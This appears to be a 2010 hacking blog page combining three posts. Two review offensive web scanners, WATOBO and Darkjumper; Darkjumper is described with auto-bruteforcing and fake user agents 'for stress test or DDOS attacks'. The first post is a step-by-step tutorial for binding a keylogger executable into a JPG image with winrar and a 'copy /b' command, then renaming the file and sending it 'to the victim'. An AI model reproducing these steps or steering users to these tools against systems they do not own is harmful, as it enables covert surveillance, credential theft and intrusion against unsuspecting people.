image + keylogger
May 27, 2010To bind any file to an image:
1- make a folder on the C drive (C:\test)
2- move the files you want to bind (keylogger.exe) and the image (sexy_girl.jpg) to the folder created
3- add the files you want to bind (keylogger.exe) to a rar archive (keylogger.rar) (you need winrar)
4- Run the cmd and type the following:
cd.. (enter)
cd.. (enter) (to get to the C drive)
cd test (or the folder you’re working on) (enter)
copy /b sexy_girl.jpg + kelogger.rar sexy_girl_result.jpg
Now You should get a confirmation message
5- That’s it, close the cmd and your keylogger image is now sexy_girl_result.jpg
You can rename it and send it to the victim
WATOBO: The Web Application Toolbox!
Think web application penetration testing and tools like Burp Suite, Fiddler and the likes. Now, you can also start thinking of WATOBO, the Web Application Toolbox! Why, you will come to know as you read this write-up!
This tool was presented at the recently held OWASP-Stuttgart in April 2010! The Web Application Toolbox has been programmed in such a way so as to enable security professionals help perform highly efficient (semi-automated ) web application security audits. The author Mr. Andreas Schmidt, is convinced that the semi-automated approach is the best way to perform an accurate audit and to identify most of the vulnerabilities.
The working of this tool is similar to WebScarab, Paros or Burp in a sense. It has a good GUI and also supports a command line input. Also, since it is semi-automated, it does not actually need to be adjusted for optimum results and correctly configured. Human intervention will obviously do good over a completely automated process. It can perform two types of checks – active and passive. Passive checks analyze data for normal browsing, including but not limited to cookie security related operations. Active checks generate questions that can be used for while say – SQL injection checks or other checks. Other than these, no additional requests are sent to the application!
What really bought us in for this tool is session-management which any free tool lacks! Burp Professional has it, but it is not free. The same with NetSparker. Also, these tools often have only limited automated functions. Customizing paid tools is not easy either. Not this one. Another good thing about this tool is that it can be quickly adapted to new requirements. In short with this tool, you can enjoy benefits of both worlds manual and automatic tools combined!
Functions of WATOBO:
- Supports session management.
- Detects logout and automatically takes a re-login.
- Supports filter functions
- Inline-Encoder/Decoder
- Includes vulnerability scanner
- Quick-scan for targeted scanning a URL
- Full-scan to scan a whole session
- Manual request editor with special functions
- Session information is updated
- Login can be done automatically
- Transcoder
- URL, Base64, MD5, SHA-1
- Interceptor
- Fuzzer
- Free, Stable and Open source!
- Script code easy to understand
- Easy to extend / adapt
- In real-world scenarios tested and developed
- Speed / usability
- Active and Passive checks
A sample screen shot of the tool:
This tool has been programmed in FxRuby which some people might not be open to work with. It will support most Windows operating systems. *Nix compatibility has not been checked or verified by us. But, the language as such supports most *Nix flavours. Other than that, it is pretty much set to be one of the top free web assessment tool. Just look at the road map that the author has planned:
- Extension of check-modules – e.g. enumeration checks (directories, file extensions ,…)
- Integration of other open-source tools such as Nikto
- WebServices / SOAP support
- Expansion of the functions / GUI
At less than 300 KB download for this tool, you sure can give it a try just like we did and were VERY impressed by this tool. Download it’s current version, which was released about 20 hours ago – watobo version 0.9.1-95 here. A set of videos that deal with the application installation, use and performing a full scan can be found here.
Darkjumper – A scanner to check for SQL injection, LFI’s and RFI vulnerabilities!
Darkjumper is a tool that will try to find every website that host at the same server at your target Then check for every vulnerability of each website that host at the same server.
Functions of darkjumper:
1. User enumeration guessing based on 4-8 chars trial taken from every site name that host at the same server.
2. Scan for sql injection,local file inclusion,remote file inclusion and blind sql injection on every site at the same server.
3. CGI and Path Scanning.
4. Port-scanning
5. Auto-bruteforcing after user enumeration
6. Auto-injector – auto column finder (mysql) if found mysql bug found
7. Proxy added
8. Verbocity added
9. IP or proxy checker and GeoIP useful for checking your IP or your proxy work or not.
- Additional feature: More fake HTTP user agent (can be used for stress test or DDOS attacks)
It is written in Python. So, this tool can be used on any operating system that supports Python.
<a href=”http://www.burstnet.com/ads/ad20486a-map.cgi/ns/v=2.3S/sz=468×60B/” target=”_top”> <img src=”http://www.burstnet.com/cgi-bin/ads/ad20486a.cgi/ns/v=2.3S/sz=468×60B/” border=”0″ alt=”Click Here” title=”Darkjumper A scanner to check for SQL injection, LFIs and RFI vulnerabilities!” /></a>
Darkjumper can be used in six modes:
- reverseonly: Only reverse target no checking bug
- surface: Checking for sqli and blind sqli on every web that host at the same target server
- full: Checking for sqli,blind,rfi,lfi on every web that host at the same target server
- cgidirs: Scanning cgidirs on the target server
- enum [number]: Guessing possible user enumeration on server (4-8 chars user enumeration)
- portscan [startport]-[endport]: Scanning open port on server target
To stop the scan run this command:
killall -9 /usr/bin/python & killall -9 /usr/bin/perl
Download Darkjumper version 5.5here
